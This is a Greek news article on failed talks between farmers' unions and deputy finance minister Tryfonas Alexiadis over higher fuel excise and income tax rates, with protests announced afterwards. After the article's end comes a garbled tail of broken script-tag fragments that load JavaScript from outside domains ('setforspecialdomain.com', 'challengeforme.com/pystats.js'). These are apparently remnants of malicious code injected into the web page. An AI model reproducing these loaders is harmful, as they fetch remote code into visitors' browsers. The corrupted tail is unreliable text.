Η κυβέρνηση επιμένει στα μέτρα -Οι αγρότες απαντούν με τρακτέρ

Ακαρπη ήταν η συνάντηση που είχαν οι αγρότες με τον αναπληρωτή υπουργό Οικονομικών Τρύφωνα Αλεξιάδη.

«Ό,τι γράφει, δεν ξεγράφει», δήλωσε ο Τ. Αλεξιάδης στους εκπροσώπους των αγροτικών συλλόγων που βρίσκονται ήδη στους δρόμους και πλέον η κυβέρνηση έχει μπροστά της ένα ακόμα ανοικτό μέτωπο.

Στη συνάντηση που κράτησε περίπου μιάμιση ώρα, τέθηκαν στο τραπέζι όλα τα ζητήματα που σχετίζονται με τη φορολογία των αγροτών, αλλά το αποτέλεσμα ήταν… μηδέν εις το πηλίκον. Επί της ουσίας, ο αναπληρωτής υπουργός Οικονομικών ξεκαθάρισε στους εκπροσώπους των αγροτών πως ό,τι έχει προβλεφθεί στη συμφωνία δεν μπορεί να αλλάξει. Κατ’ αρχάς, για την αύξηση του ΕΦΚ στο αγροτικό πετρέλαιο από τα 66 στα 200 ευρώ ανά χιλιόλιτρο, έχει ήδη εκδοθεί η πρώτη ενημερωτική εγκύκλιος. Το θέμα του αφορολογήτου των αγροτικών αποζημιώσεων και επιδοτήσεων έχει, επίσης, λυθεί με την κατάργηση των ευνοϊκών διατάξεων της Άνοιξης και το μόνο που μένει σε εκκρεμότητα είναι η αύξηση του φορολογικού συντελεστή από το 13% στο 20% και στη συνέχεια στο 26%.

Αυτό που διευκρίνισε ο Τ. Αλεξιάδης στους αγρότες είναι ότι το 20% θα αφορά στη χρήση του 2016 που θα εκκαθαριστεί το 2017, αφήνοντας ανοικτό μόνο ένα “παράθυρο” για αναγνώριση περισσότερων εκπιπτόμενων δαπανών, έτσι ώστε το φορολογητέο εισόδημα και ακολούθως ο φόρος, να περιορίζονται δια της… πλαγίας. Ωστόσο, αυτό προϋποθέτει τη σύμφωνη γνώμη των δανειστών, όπως επίσης το αίτημα των αγροτών να τους αναγνωρίζεται κάποιο μικρό αφορολόγητο, που σήμερα δεν προβλέπεται.
“Θολές” παραμένουν, επίσης, οι προϋποθέσεις υπό τις οποίες θα χαρακτηρίζεται κάποιος ως κατ’ επάγγελμα αγρότης, ο οποίος ενδεχομένως να τυγχάνει χαμηλότερης φορολόγησης. Όσον αφορά, δε, στη φορολογία των αγροτικών ακινήτων και ειδικά των καλλιεργούμενων αγροτεμαχίων, μπορεί η κυβέρνηση να εξετάζει την απαλλαγή τους, ωστόσο η συζήτηση χαρακτηρίζεται πρόωρη, με δεδομένο ότι η διαβούλευση για το φόρο που θα αντικαταστήσει τον ΕΝΦΙΑ δεν πρόκειται να ξεκινήσει νωρίτερα από τις αρχές του 2016.

Ετοιμοι για νέες κινητοποιήσεις  
Μετά το τετ α τετ ο κ.Παπακωνσταντίνου, αφού επιβεβαίωσε το ναυάγιο των συζητήσεων προανήγγειλε νέες κινητοποιήσεις, τις οποίες θα αποφασίσουν οι κατά τόπους Ενώσεις.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >